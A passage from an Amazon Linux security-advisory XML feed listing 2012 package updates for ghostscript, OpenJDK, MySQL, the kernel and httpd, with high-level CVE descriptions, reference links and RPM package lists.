Ghostscript included the current working directory in its library search path by default. If a user ran Ghostscript without the "-P-" option in an attacker-controlled directory containing a specially-crafted PostScript library file, it could cause Ghostscript to execute arbitrary PostScript code. With this update, Ghostscript no longer searches the current working directory for library files by default.
CVE-2010-4054:
The gs_type2_interpret function in Ghostscript allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) via crafted font data in a compressed data stream, aka bug 691043.
A flaw was found in the way Ghostscript interpreted PostScript Type 1 and PostScript Type 2 font files. An attacker could create a specially-crafted PostScript Type 1 or PostScript Type 2 font file that, when interpreted, could cause Ghostscript to crash or, potentially, execute arbitrary code.
CVE-2010-2055:
It was found that Ghostscript always tried to read Ghostscript system initialization files from the current working directory before checking other directories, even if a search path that did not contain the current working directory was specified with the "-I" option, or the "-P-" option was used (to prevent the current working directory being searched first). If a user ran Ghostscript in an attacker-controlled directory containing a system initialization file, it could cause Ghostscript to execute arbitrary PostScript code.
Ghostscript 8.71 and earlier reads initialization files from the current working directory, which allows local users to execute arbitrary PostScript commands via a Trojan horse file, related to improper support for the -P- option to the gs program.
CVE-2009-3743:
Off-by-one error in the Ins_MINDEX function in the TrueType bytecode interpreter in Ghostscript before 8.71 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a malformed TrueType font in a document that trigger an integer overflow and a heap-based buffer overflow.
An integer overflow flaw was found in Ghostscript's TrueType bytecode interpreter. An attacker could create a specially-crafted PostScript or PDF file that, when interpreted, could cause Ghostscript to crash or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3743" title="" id="CVE-2009-3743" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2055" title="" id="CVE-2010-2055" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4054" title="" id="CVE-2010-4054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4820" title="" id="CVE-2010-4820" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0095.html" title="" id="RHSA-2012:0095" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ghostscript-doc" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-11.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-43</id><title>Amazon Linux - ALAS-2012-43: critical priority package update for java-1.6.0-openjdk</title><issued date="2012-02-15 17:12:00" /><updated date="2014-09-14 15:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0506:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to CORBA.
It was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data.
CVE-2012-0505:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
It was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2012-0503:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to I18n.
It was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions.
CVE-2012-0502:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and availability, related to AWT.
A flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information.
CVE-2012-0501:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect availability via unknown vectors.
An off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially-crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened.
CVE-2012-0497:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, and 6 Update 30 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
It was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer. Malicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions.
CVE-2011-5035:
The HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially-crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200.
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869.
CVE-2011-3571:
Unspecified vulnerability in the Virtual Desktop Infrastructure (VDI) component in Oracle Virtualization 3.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Session.
The AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2011-3563:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote attackers to affect confidentiality and availability via unknown vectors related to Sound.
This update fixes several vulnerabilities in the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime Environment and the IBM Java 1.4.2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
The Java Sound component did not properly check buffer boundaries. Malicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3563" title="" id="CVE-2011-3563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3571" title="" id="CVE-2011-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5035" title="" id="CVE-2011-5035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0497" title="" id="CVE-2012-0497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0501" title="" id="CVE-2012-0501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0502" title="" id="CVE-2012-0502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0503" title="" id="CVE-2012-0503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0505" title="" id="CVE-2012-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0506" title="" id="CVE-2012-0506" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0135.html" title="" id="RHSA-2012:0135" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-44</id><title>Amazon Linux - ALAS-2012-44: important priority package update for mysql</title><issued date="2012-02-15 17:18:00" /><updated date="2014-09-14 15:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0492:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783817:
CVE-2012-0492 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0490:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783815:
CVE-2012-0490 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0485:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783809:
CVE-2012-0485 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0484:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783808:
CVE-2012-0484 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality
CVE-2012-0120:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783807:
CVE-2012-0120 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0119:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783806:
CVE-2012-0119 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0118:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783805:
CVE-2012-0118 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and availability
CVE-2012-0116:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783803:
CVE-2012-0116 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and integrity
CVE-2012-0115:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783802:
CVE-2012-0115 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0114:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783801:
CVE-2012-0114 mysql: Unspecified vulnerability allows local users to affect confidentiality and integrity
CVE-2012-0113:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783800:
CVE-2012-0113 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and availability
CVE-2012-0112:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783799:
CVE-2012-0112 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0101:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783797:
CVE-2012-0101 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0087:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783795:
CVE-2012-0087 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0075:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2011-2262:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2262" title="" id="CVE-2011-2262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0075" title="" id="CVE-2012-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0087" title="" id="CVE-2012-0087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0101" title="" id="CVE-2012-0101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0112" title="" id="CVE-2012-0112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0113" title="" id="CVE-2012-0113" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0114" title="" id="CVE-2012-0114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0115" title="" id="CVE-2012-0115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0116" title="" id="CVE-2012-0116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0118" title="" id="CVE-2012-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0119" title="" id="CVE-2012-0119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0120" title="" id="CVE-2012-0120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0484" title="" id="CVE-2012-0484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0485" title="" id="CVE-2012-0485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0490" title="" id="CVE-2012-0490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0492" title="" id="CVE-2012-0492" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0105.html" title="" id="RHSA-2012:0105" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql-embedded-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-embedded-devel-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-test" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-test-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-debuginfo" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-debuginfo-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-embedded" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-embedded-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-libs" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-libs-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-server" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-server-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-bench" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-bench-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-devel-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-libs" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-libs-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-server" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-server-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-embedded-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-embedded-devel-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-debuginfo" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-debuginfo-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-devel-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-bench" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-bench-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-test" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-test-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-embedded" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-embedded-5.1.61-1.27.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-45</id><title>Amazon Linux - ALAS-2012-45: medium priority package update for kernel</title><issued date="2012-02-15 17:38:00" /><updated date="2014-09-14 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4086:
The journal_unmap_buffer function in fs/jbd2/transaction.c in the Linux kernel before 3.3.1 does not properly handle the _Delay and _Unwritten buffer head states, which allows local users to cause a denial of service (system crash) by leveraging the presence of an ext4 filesystem that was mounted with a journal.
749143:
CVE-2011-4086 kernel: jbd2: unmapped buffer with _Unwritten or _Delay flags set can lead to DoS
* A flaw was found in the way the Linux kernel's journal_unmap_buffer() function handled buffer head states. On systems that have an ext4 file system with a journal mounted, a local, unprivileged user could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4086" title="" id="CVE-2011-4086" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-107.1.36.amzn1.noarch.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-107.1.36.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="107.1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-107.1.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-46</id><title>Amazon Linux - ALAS-2012-46: medium priority package update for httpd</title><issued date="2012-02-16 10:48:00" /><updated date="2014-09-14 15:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0053:
protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
The httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.
CVE-2012-0031:
scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
A flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.
CVE-2011-3639:
The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
